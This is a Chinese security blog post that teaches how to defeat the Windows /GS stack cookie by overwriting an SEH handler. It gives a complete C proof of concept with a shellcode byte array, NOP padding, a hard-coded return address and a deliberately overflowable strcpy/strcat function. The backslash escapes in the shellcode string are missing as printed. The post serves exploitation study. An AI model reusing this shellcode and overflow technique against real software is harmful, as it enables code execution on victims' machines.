扫一扫关注公众号,长期致力于安全研究
前言:本文通过SEH异常绕过GS安全机制
直接看下图吧,看完之后是不是发现了对普通的栈溢出有了很大的限制性
但是不要灰心,为了性能,有些是不会使用GS的
(1)函数不包含缓冲区。
(2)函数被定义为具有变量参数列表。
(3)函数使用无保护的关键字标记。
(4)函数在第一个语句中包含内嵌汇编代码。
(5)缓冲区不是 8 字节类型且大小不大于 4 个字节
根据0X01中的内容,如果当Security Cookie与原.data中副本的值不吻合,就会触发异常,而触发异常的话寻找的是最近的S.E.H异常结构体。
这样的话就可以根据此点突破GS机制,当shellcode足够长,覆盖到S.E.H入口函数地址即可(此时入口函数地址修改为shellcode地址)。
全部代码如下,遇到strcpy一眼就看出是一个溢出了,继续往下看strcat,这里字符串拼接肯定是会到异常的,当异常的话,就会执行我们的shellcode了。
char shellcode[]="xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C""x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53""x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B""x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95""xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59""x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A""xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75""xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03""x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB""x53x68x77x65x73x74x68x66x61x69x6Cx8BxC4x53x50x50""x53xFFx57xFCx53xFFx57xF8x90x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"//差21个"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x78xFEx12x00";void test(char* input){char buf[200];strcpy(buf,input);strcat(buf,input);}int _tmain(int argc, _TCHAR* argv[]){test(shellcode);return 0;}
下方扫一下扫,即可关注
本文始发于微信公众号(安全族):对抗GS之攻击异常处理突破 GS
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论